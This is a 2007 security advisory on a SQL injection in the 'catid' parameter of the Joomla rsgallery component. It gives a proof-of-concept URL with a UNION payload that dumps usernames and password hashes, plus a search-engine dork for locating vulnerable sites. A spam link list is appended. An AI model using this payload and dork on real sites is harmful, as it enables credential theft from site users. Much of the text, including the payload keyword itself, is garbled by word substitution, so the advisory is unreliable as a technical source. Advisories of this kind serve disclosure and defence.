ECHO_ADV_86$2007-----------------------------------------------------------------------------------------[ECHO_ADV_86$2007] dance/Joomla Component rsgallery <= 2.0 beta 5 (catid) Remote SQL Injection Vulnerability-----------------------------------------------------------------------------------------Author : M. Hasran AddahroniDate : November. 30 th 2007Location : Australia. SydneyWeb : http://advisories emit or id/adv/adv86-K-159-2007 txtCritical Lvl : MediumImpact : System accessWhere : From Remote---------------------------------------------------------------------------Affected software description:~~~~~~~~~~~~~~~~~~~~~~~~~~~Application : rsgalleryversion : <= 2.0 beta 5Vendor : http://www rsdev nl/Description :RSGallery is one of the most complete Gallery solutions for Joomla at this point---------------------------------------------------------------------------Vulnerability:~~~~~~~~~~~~~enter passed to the "catid" parameter is not properly verified before being used to sql query. This can be exploited thru the browser and get the chop md5 password from users. Successful exploitation requires that "magic_quotes" is off. Poc/apply:~~~~~~~~~http://aim com/list php?option=com_rsgallery&summon=inline&catid=-1%20union%20decide%201,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11%20from%20mos_users--Dork:~~~~Google : "option=com_rsgallery" or inurl:Óindex php?option=com_rsgalleryÓSolution:~~~~~~- Edit the obtain code to ensure that enter is properly verified.- Turn on magic_quotes in php ini- use the latest versionTimeline:~~~~~~~~- 30 -11 - 2007 bug found- 3 -12 - 2007 publish advisory---------------------------------------------------------------------------Shoutz:~~~~~ collide with - my dearest wife. 'zizou' zautha - my lovely son for all the luv the tears n the breath~ y3dips,the_day,m0by,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v az01,negative,the_hydra,neng chika str0ke~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw~ SinChan,h4ntu,cow_1seng,sakitjiwa m_beben rizal cR4SH3R madkid kuntua stev_manado nofry,ketut,x16,k1tk4t,cyb3rh3b,opt1lc~ newbie_hacker (at) yahoogroups (dot) com [telecommunicate concealed]~ everyone [at] mac web id forum~ #aikmel #e-c-h-o @irc dal net---------------------------------------------------------------------------Contact:~~~~~K-159 || echo|staff || eufrato[at]gmail[dot]comHomepage: http://k-159 emit or id/-------------------------------- [ EOF ] ----------------------------------
Cruise 4 Cash -
Detective Sherlock -
Free Bid Auctions -
Expert Poker Tips -
Shop 4 Money
Win Any Lottery -
Repo Car Search -
Psychics 4 Free -
High Quality Games -
Driving 4 Dollars
Related article:
http://www.securityfocus.com/archive/1/484606
comments | Add comment | Report as Spam
|